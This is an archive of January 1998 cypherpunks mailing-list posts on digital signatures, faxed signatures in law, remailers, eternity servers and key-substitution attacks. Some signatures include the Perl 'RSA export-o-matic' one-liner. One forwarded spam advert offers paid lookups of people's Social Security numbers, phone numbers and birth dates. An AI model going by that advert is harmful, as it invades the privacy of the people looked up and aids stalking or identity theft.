Content-Type: text/plain



    --
I have to say, I really enjoy your posts
TruthMonger - as deranged as they are.

So out of all of us, who's going to the steg
conference this april?

Also, is there a java version of crypto kong
so I can use it in linux?

And the solution to the speeding-ticket-giving
camera is, of course, camo paint jobs.  But
you all knew that, right?


    --digsig
         
     EojdyErVslc/s6aQeIHwnOlMw3lUKJhdZc/ZeCNfe7H
     QbR0ngV/+ZI9uuiEe6o4CkfBhQowsHozF7TsZU5f
     40HJxqCEceUgzeJFjTbRWSH9LJxdzYMLQbtwctBfM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "wabe" <wabe@smart.net>
Date: Sat, 17 Jan 1998 03:55:55 +0800
To: <cypherpunks@toad.com>
Subject: Re: e-mail muddling.
Message-ID: <008801bd22cf$131ec440$ab8588d1@justice>
MIME-Version: 1.0
Content-Type: text/plain



    --
Also wouldn't it be easier to de-muddle an e-mail
message than a brute force attack?  I mean,
you KNOW what muddled it.  And you know
the general way it got muddled.  It's not pgp,
it's just some line breaks a bit too early for their
time...
-wabe

    --digsig
         
     EojdyErVslc/s6aQeIHwnOlMw3lUKJhdZc/ZeCNfe7H
     zvMubhARmsdOWVOYi7Su/Y9qnSIOIjc9Wuqb6G5G
     40asyOJEF0Kflm3y9623Ab0qCaryGJ1TtAaE4JU1y







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Sat, 17 Jan 1998 04:04:04 +0800
To: cypherpunks@ssz.com
Subject: Re: Legality of faxed signatures.
Message-ID: <3.0.3.32.19980116145928.0339e060@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 10:07 AM 1/16/98 -0800, James A. Donald wrote:
>I believe that there is case law or legislation that a faxed
>signature is worthless if it is bit for bit identical with
>another signature, which of course it usually is these days.
>
>Can anyone with a spot of legal knowledge give me something
>impressive sounding to scare people who rely on those
>signatures.

In Georgia, the state appeals court declared that faxes are "beeps and
chirps" and therefore not writings.  As a fax is not a writing, it cannot
have a signature.  Therefore the signature cannot be valid.  This was in a
case that involved a required notice to arrive by a certain time.

Traditionally, on a writing anything is a signature including an 'X', spit,
and the words "Mickey Mouse".


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Sat, 17 Jan 1998 07:16:38 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
In-Reply-To: <v03102800b0e16505cc00@[207.167.93.63]>
Message-ID: <3.0.3.32.19980116150412.006a44e8@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 10:17 AM 1/16/98 -0800, bill.stewart@pobox.com wrote:
>At 11:02 AM 1/13/98 -0800, Tim May wrote:
>>As I have made clear, I don't believe "banning research" which is neither
>>"commerce between the states" nor a direct harm to others (as the
"robbery"
>>example Michael Froomkin used earlier as a parallel is), is supported by
>>the Constitution.
>
>There are different degrees of UnConstitutionalness.  Some things are so
>blatantly off the edge that even if Congress passed them, they'd be
laughed
>out of the first court that addressed them, like banning plant-growing
>or discrete mathematics or arresting everybody with Japanese ancestors.
>Others are much grayer areas, where court cases addressing them 
>would take a long time and cost a lot of money, which can be prohibitively
>expensive for the early phases of research.

Hate to bust your bubble, but they did the Japanese thing during WWII...the
survivors and next of kin finally got a token payment last year.

>Alternatively, [Note: End of serious section] they could use the
>confiscatory tax model pioneered with the machine gun and marihuana bans -
>the tax on cloning body parts is an arm and a leg, but if you
>clone an entire human it'll cost you your firstborn child...

They have machine gun bars!!!  I think I'll take up drinking! :)


-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNL/na8JF0kXqpw3MEQIgVwCdGSVh/DcIQEDLuq13PBa++52IpfAAmwT1
vL1W6JlBhRK07B0Xj/xKRPkz
=tbH/
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 17 Jan 1998 04:20:09 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: Wassenaar Rule Update
Message-ID: <1.5.4.32.19980116201222.006ea474@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Good point about the hazard of EXE files. Thanks. 
A zip file is available:

   http://jya.com/bxa-wa-rule.zip  (168K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 17 Jan 1998 06:32:43 +0800
To: steve@tightrope.demon.co.uk
Subject: non-transferable signatures (Re: Crypto Kong penetration.)
In-Reply-To: <19980116104604.39449@tightrope.demon.co.uk>
Message-ID: <199801161530.PAA00710@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




James Donald <jamesd@echeque.com>:
> On Thu, Jan 15, 1998 at 12:08:46PM -0800, Tim May wrote:
> > The fact is that most people don't see the need to either secure their
> > messages against eavesdroppers or to sign their messages. But PGP was
> > "cool" and rode the same wave that "Wired" rode.
> 
> Few messages to the cypherpunks list are signed.

It might in fact be a dumb move to sign messages to the cypherpunks
list -- proving that you wrote whatever, when for example the USG adds
cypherpunks to it's growing list of terrorist organisations.

Similarly it might be dumb to sign private messages to other
subscribers -- some of them may turn out to be narcs, or may be
coereced into narcing etc.

You can use non-transferable signatures for private email, but it's
probably better not to sign publically posting messages, unless you
have a persistent anonymous nym unlinkable with your meat space
persona.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Sat, 17 Jan 1998 07:36:58 +0800
To: cypherpunks@cyberpass.net
Subject: PEOPLEFINDERS
Message-ID: <v03102801b0e59f05499b@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



>From: search@peoplefinders.net
>Sender: search@peoplefinders.net
>To: <aztarman@aol.com>
>Reply-To: search@peoplefinders.net
>Subject:  PEOPLEFINDERS
>Mime-Version: 1.0
>Date: Thu, 15 Jan 1998 05:35:48 -0500
>
>Imagine finding old friends, classmates, long lost relatives, old shipmates, ex-husbands, ex-wives, old girlfriends, or old boyfriends...
>
>WE FIND PEOPLE
>
>No matter why you are looking we can help. We utilize only ethical and legal means. Nothing is obtained though any illegal means whatsoever.
>
>The explosion in on-line information has allowed us to build an extremely powerful database searching program specifically designed to locate people...
>
>We search over 90 data bases instantly -- electronically searching virtually every clue that a trained gumshoe might think of -- and then some.
>
>PUBLIC RECORDS ARE AVAILABLE
>
>No doubt you have read that information about you and almost everyone else is available on-line. Its TRUE! Every time you renew your drivers license, apply for credit, order goods my mail or subscribe to a periodical, the information about who you are and where you can be found is created. The information is not always free -- but it is certainly out there -- readily available to anyone who knows how and where to look.
>
>If fact there is entirely too much information available! Huge amounts of data make searching for your piece of the puzzle exceedingly difficult.
>
>WE HAVE AUTOMATED THE PROCESS
>
>Our computers search in a systematic automated way for the information you need. Without an organized and automated search program you would literally drown in the data. Which state's motor vehicle records would you check first? What if it cost some money?
>
>We know where to look -- we have been locating people for years working with insurance companies, collection agencies and attorneys. If a public record is available we will know about it, and we will have the access necessary to get results.
>
>LOW COST!
>
>Our highly organized and automated structure allows us to work for our clients on a person by person basis for a very low cost -- $19.00 per search payable by credit card or check. Not bad considering that access to some of the 34 states who offer DMV information on-line can cost upwards of $200 per year. And private detectives can charge $200 per hour!!!
>
>WHAT YOU GET
>
>The basic search results will give you the name and address of the person you are searching for. The cost for this basic service is $19.00. Additional charges are:
>
>     Telephone number: $10.00
>     Social Security number: $10.00
>     Spouse name: $10.00
>     Date of Birth: $10.00
>
>You will only be charged for the information you request and the information we are able to provide.
>
>HOW IT WORKS
>
>If we find the person you are looking for, and only if we find them, we will charge your credit card or deposit your check. If we don't find them, we won't charge you or we will return your check. You don't need to sign a long-term contract, have a modem hook up, Internet access or anything else. Simply print the Search Form, complete it and fax it to us at (212) 213-3320. We will fulfill your request within twenty four hours. If E-mail is more convenient, just complete the form below and reply to search@peoplefinders.net, or if you prefer, you can mail your request to: PeopleFinders, Inc. 11 East 36th Street, 10th Floor, New York, NY 10016.
>
>REMEMBER - IT'S GUARANTEED
>
>If you are not satisfied within 30 days from the time you receive your results -- we will refund your money!!!
>
>ORDER FORM
>
>PLEASE ATTEMPT TO LOCATE THE PERSON LISTED BELOW. (PLEASE PRINT CLEARLY)
>
>1. SUBJECT COMPLETE NAME:       _____________________________________
>   (middle initial helps)
>2. LAST KNOWN ADDRESS:          _____________________________________
>
>3. CITY, STATE AND ZIP:         _____________________________________
>
>4. LAST KNOWN TELEPHONE:        _____________________________________
>   (include area code)
>5. SUBJECT DATE OF BIRTH:       _____________________________________
>   (approximate is OK)
>6. SUBJECT SOCIAL SECURITY NO.: _____________________________________
>
>7. MISCELLANEOUS INFORMATION:   _____________________________________
>   (any other info you have)
>
>Items (1) (2) and (3) above - REQUIRED.
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>       UPON COMPLETION OF THE ABOVE REQUESTED SEARCH, PLEASE:
>
>[ ] MAIL or [ ] FAX or [ ] E-mail the results of the search to:
>
>YOUR NAME (please print)         _____________________________________
>YOUR ADDRESS (if mailing)        _____________________________________
>CITY, STATE and ZIP (if mailing) _____________________________________
>YOUR FAX NUMBER (if faxing)      _____________________________________
>YOUR E-MAIL ADDRESS              _____________________________________
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>         CHECK THE APPROPRIATE BOXES FOR THE SERVICES YOU REQUIRE.
>
>[ ] $19.00 per request.(The basic search results will give you the name and address of the person you are searching for.)
>
>[ ] Additional $10.00 for person's telephone number (if available).
>
>[ ] Additional $10.00 for person's social security number (if available).
>
>[ ] Additional $10.00 for person's spouse name (if available).
>
>[ ] Additional $10.00 for person's date of birth (if available).
>
>Total Cost of search (if successful) $ ______________________
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>                    PLEASE ACCEPT THE FOLLOWING PAYMENT:
>
>[ ] My check is enclosed.
>[ ] Charge my [ ] Amex [ ] MC [ ] VISA
>
>ACCOUNT NUMBER: ______________________ EXPIRATION: __________________
>
>I understand that my check will not be deposited or my credit card charged unless PeopleFinders locates the subject person I am seeking. PeopleFinders, Inc. will quarry their data bases and attempt to locate the person. If successful, PeopleFinders will deposit my check or charge my credit card. I agree that I have thirty (30) days to request a full refund if I am not satisfied with the results. I hereby authorize PeopleFinders to charge my credit card.
>
>AUTHORIZED SIGNATURE: _________________________________________
>
>PRINT this page and mail or fax the order form to:
>
>PeopleFinders, Inc.
>11 East 36th Street, 10th Floor
>New York, NY 10016
>FAX (212) 213-3320
>
>Additional information available at (212) 213-3000 Ext. 1900 or via E-mail - search@peoplefinders.net. Thank you.
>
>////////////////////////////////
>
>If you wish your name removed from all future mailings - simply reply to this message with "REMOVE" in the subject line. Thank you.
>
>////////////////////////////////
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sat, 17 Jan 1998 07:41:20 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Microsoft Metaphors
In-Reply-To: <v03007808b0e3d6ab4a0f@[204.254.22.155]>
Message-ID: <3.0.5.32.19980116153614.00838100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:51 AM 1/15/98 -0800, Tim May wrote:
>Skip the misleading metaphors and simply describe what the Web is (duh!), 
>what a browser is, and what Microsoft is bundling with their OS.
>Anybody who by now doesn't know what these three items are is too 
>stupid to grasp metaphor, anyway.
>
>(Unless it's this: "Like, think of a beer company. The company wants to
>include a can opener with the beer. Like, they even want to include an
>automatic opening thing they call a "pop-top." Netscape, a maker of can
>openers, wants the Justice Department to force Microsoft to remove this
>pop-top feature so that more people will have to buy their can opener.")

Actually, to continue twisttied analogies,
MS is a maker of those plastic 6-pack-holder straps, and has 
recently discovered that beer is an important market (!) and 
added canned beer to their list of things they can hold 
(along with MS NewCoke, MS OEM-Cola.RC, MS Canned OJ, MS Canned News,
and MSBeans.)

Netscape, a maker of bottled beer (available singly, in cases, 
or in cardboard sixpack holders), wants the Feds to stop
Microsoft from selling their plastic straps integrated with beer.

All of us old geezers who remember drinking Home Brewed Real Beer
and the younger hackers who were exposed to beer from kegs in college
   (even if they buy canned Rolling Rock at home because it's cheap)  
have been telling people for years that canning beer is a Bad Thing
and that Microsoft wouldn't know beer if it bit them on the wallet.

Bottles aren't a bad way to store beer, if you must sell it packaged,
though Netscape's got a lot of gall complaining that MS makes dealers
of MSBeerCans and MSBeerCanRings sell MSBeer along with them,
seeing as how Netscape got their start giving away free beer
in paper cups using the Computer Science Department Recreation Fund,
and got the idea for Beer from those Europeans anyway, even if they did
add the innovation of selling it in cheap one-drink-sized containers....


[OK, it wasn't very good, but at least it was better than
doing yet another bunch of Java metaphors.
Hmmm - there _are_ several brands of canned coffee,
most of which taste like Microsoft made them.... :-]
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 05:22:16 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Nanotechnology (fwd)
Message-ID: <199801162148.PAA11597@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Jan 1998 22:10:07 +0100 (MET)
> Subject: Nanotechnology
> From: nobody@REPLAY.COM (Anonymous)

> I think people here seriously underestimate how long nanotech will take.

Speak for your self...;)


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sat, 17 Jan 1998 08:02:07 +0800
To: cryptography@c2.net
Subject: UPDATE!! BAY AREA CYPHERPUNKS MEETING, SATURDAY 1/17, OAKLAND
Message-ID: <3.0.5.32.19980116154921.008b6e30@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Sameer asks that, due to building access limitations,
everybody please show up by 2pm to be sure the guards will let you in, and
"humor building management and sign in as requested by the guard".

And there's a parking lot on Franklin between 12th and 13th,
which is a block or two east/south of Broadway.

> The January Bay Area Cypherpunks Meeting will be Saturday afternoon
> at C2 Software's office in Oakland.
> 
> Agenda:   Export Laws - Lee Tien and Greg Broiles
> 	   Work in Progress
> 	   Lots of discussion from RSA Conference.
> 
> Time:     12-6pm followed by dinner - program starts at 1:00
> Location: C2Net Software, Inc. 1440 Broadway Suite 700, Oakland, CA
>           Phone: (510) 986-8770  Fax: (510) 986-8777 
> Public Transportation - about two blocks from the 12th St BART station.
> 	   This is the best way to get there from San Francisco,
> 	   and parking for BART trains is easy.  :-)
> Driving - From South - take 880N to Broadway exit, about .9 mile, park
>           From San Francisco - Take the Bay Bridge to Grand Ave,
> 		turn right on Telegraph and continue on Broadway.
	     If you find yourself on 980, 11th or 12th goes to Broadway.
> 	
> Map URL:  http://www.mapblast.com/yt.hm?FAM=mapblast&CMD=GEO&SEC=find&IC=0%3A0%3A5&IC%3A=C2+Suite+700&AD2=1440+Broadway&AD3=Oakland%2C+CA

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 06:45:59 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Eternity - an alternative approach (fwd)
Message-ID: <199801162312.RAA12160@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 16 Jan 1998 22:02:55 -0000
> From: Kay Ping <kping@nym.alias.net>
> Subject: Eternity - an alternative approach

> In one of the messages on the eternity thread someone suggested using
> radio signals. This is an interesting approach which certainly deserves
> further attention but digital radio requires special hardware which I prefer 
> to avoid.

There is at least one way to do it with standard equipment, course it must
be 1-way only. The source takes the phone line from their standard 4800
modem and put it in the audio in (both should be 600 ohm, be shure to use a
matching transformer for isolation). At the other end you do the same sort
of thing but use the modem to decode the data. You can not have full-duplex
with this method, half-duplex only.

> Radio is also quite good at hiding the location of the transmitter - you
> tune your radio and the signals are just there, coming down your antenna.
> It takes special equipment to locate where they originated.

Yeah, another radio, a map, a ruler & pen, a omni-directional antenna, and a
car. Check out the ARRL for various antenna designs.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 06:50:07 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: non-transferable signatures (Re: Crypto Kong penetration.) (fwd)
Message-ID: <199801162319.RAA12288@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Jan 1998 15:30:05 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: non-transferable signatures (Re: Crypto Kong penetration.)

> It might in fact be a dumb move to sign messages to the cypherpunks
> list -- proving that you wrote whatever, when for example the USG adds
> cypherpunks to it's growing list of terrorist organisations.

We're an 'organization'? Where is my monthly newsletter?....;)
We should also pick our treasurer with some care. It is the prime target for
law enforcement since it provides them access to the money records.

In general I have to agree with Adam though, in the real world with
ubiquitous and surreptitious monitoring signing documents is actualy a
liability in many if not most cases. About the only exception is dealing
with a contractual relationship.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 06:53:26 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: forward secrecy for mixmaster & email (Re: remailer resistancs to attack) (fwd)
Message-ID: <199801162321.RAA12340@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Jan 1998 21:54:34 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: forward secrecy for mixmaster & email (Re: remailer resistancs to attack)
> 
> Make that instant key changes for mixmaster remailers by using forward
> secrecy and direct IP delivery to enable the interactive
> communications pattern required for immediate forward secrecy.  Ulf
> Moeller (current mixmaster maintainer) has this on his to do list I
> think.

I agree. It is probably one of the most misunderstood and must
under-addressed problem with crypto in my opinion.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 07:07:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Sun to fight MS w/ new workstations [CNN] (fwd)
Message-ID: <199801162336.RAA12510@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 17 Jan 1998 00:00:09 +0100 (MET)
> Subject: Re: Sun to fight MS w/ new workstations [CNN]
> From: nobody@REPLAY.COM (Anonymous)

> Hmm...  Considering that you can buy a PC w/ Linux and have a Unix
> workstation for less than the cost of a new computer with NT, I wonder
> who Sun is really targetting here.

Corporations and businesses which feel more secure with a commercial
enterprise backing the system.

> Most of the people buying NT are the same people who bought their last
> OS from Microsoft, and don't feel like trying anything new.

There are *many* businesses which have been unix shops exclusively in the
past who are now implimenting NT based servers for a variety of reasons.
In some cases the intent is to drop the Unix boxes completely over the span
of say 5-10 years as alternate applications become available.

It's a bigger market than the home, soho, or individual corporate user at
stake.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 07:21:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for (fwd)
Message-ID: <199801162348.RAA12709@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Jan 1998 12:29:34 -0800
> From: Jonathan Wienke <JonWienk@ix.netcom.com>
> Subject: Re: how to release code if the programmer is a target for
>   coercion (fwd)

[my entire previous post deleted...geesh]

> Jim, there are > 2 parties in the matter being discussed:

EXACTLY. That is why there is a potential for a MITM (requires at least
3 parties) attack.

> My key is publicly available at the MIT keyserver; it has been since PGP
> 5.0 came out.

So what? If Alice is being monitored for whatever reason and she requests
your key Mallet simply intercedes and inserts their own key. How is Alice
going to catch a clue?

> key.  It would be fairly difficult for any attacker to forge a signature
> with a false key;

It isn't the source but the recipient that is under attack.

[rest deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Sat, 17 Jan 1998 07:09:47 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Legality of faxed signatures.
In-Reply-To: <199801162156.NAA01504@proxy3.ba.best.com>
Message-ID: <3.0.3.32.19980116175450.0312afd4@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:56 PM 1/16/98 -0800, James A. Donald wrote:
>This is a big problem for me, because I want to scare
>businessmen into using digital signatures.  

Part of the process for having a Digital Signature law is to establish the
definition of a writing.  Since faxes are not writings, but email is, you
should be able to scare them into digital signatures pretty easily.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 17 Jan 1998 07:36:31 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: reasons for local eternity proxies (Re: remailer resistancs to attack) (fwd)
Message-ID: <199801170004.SAA12914@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Jan 1998 21:42:52 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: reasons for local eternity proxies (Re: remailer resistancs to attack)
> 
> (Reason for local news feed being preferabl is that it protects the
> NNTP traffic which would otherwise allow eavesdroppers to observer
> which articles you were reading.  SSL is only a partial solution
> because you are then trusting the SSL NNTP server operator.) 

>From a criminal perspective is it really important to know what you were
reading but rather what you were generating? Using Van Eck it would be much
easier and cheaper to determine what you were reading than spend the money,
physical resources, and people time to figure it using traffic analysis.

It's more incriminating to prove you sent a request for illicit data than
you downloaded it. Sending it out shows premeditated intent. Simply
downloading it shows only curiosity with no other evidence. Simple traffic
analysis will determine your sourcing data even if it is fully encrypted.

> Local servers don't generate any traffic, "local server" is really a
> misnomer, it is a local proxy for reading news... it presents a view
> of USENET articles which makes them appear as web pages.  It keeps
> copies of those web pages more up to date versions are read in news,
> this allows fast access to the web space.

I point my local news readers at my ISP's news server so I don't flood my
link with several gig's of traffic a day. This is the primary objection to
hosting a 'real' local news server - the bandwidth and hardware resource
issues place it outside of most peoples financial ability.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Blair <jdblair@frodo.tucc.uab.edu>
Date: Sat, 17 Jan 1998 08:14:12 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Legality of faxed signatures.
In-Reply-To: <199801162211.OAA14165@proxy3.ba.best.com>
Message-ID: <199801170006.SAA06076@frodo.tucc.uab.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----



Any lawyers on this list may want to correct me, but as I understand 
it contract law is *extremely* flexible concerning what a "signature" 
is.  It is perfectly legal to negotiate a contract via conventional, 
plaintext e-mail.  If you wrote a contract for me to sign and I wrote 
back "I accept this contract" then legally a contract would exist.  
This is the same as if you phoned me, described a problem, and agreed 
to pay me to solve the problem.  Legally a contract would exist 
(though it would be foolish not to put the contract in writing in 
most situations).  The law is concerned more with the ritual of 
forming the contract (preferably by writing it on some medium that 
can be examined at a later date) followed by some sort of record that 
both parties agree on the contract they formed.  In fact, businesses 
work like this all the time.  The reason it works is that the best 
way to enforce a contract is to *trust* the person you're forming a 
contract with.

Obviously, just negotiating a contract via e-mail is dangerous.  All 
of us know there are ways to forge or repudiate parts or all of this 
transaction.  A paper signature, just like a digital signature, is an 
excellent tool for non-repudiation (You say: I didn't sign that!  
Your opponent says: we know you signed this b/c this is your 
handwriting/public key/etc).  Whether or not it seems to be a good 
idea from the viewpoint of computer science is irrelevant-- the law 
focuses on the *ritual,* not the specific form of the document.

Note-- I'm deriving this statement from a study that I did on digital 
signatures in contract law that was part of my undergraduate thesis.  
I am not a legal expert.  If I am totally off-base please explain to 
me where I am wrong so I may revise my notions concerning contract 
law.


......................................................................
.                                                                    .
.....John.D.Blair...   mailto:jdblair@uab.edu   phoneto:205.975.7123 .
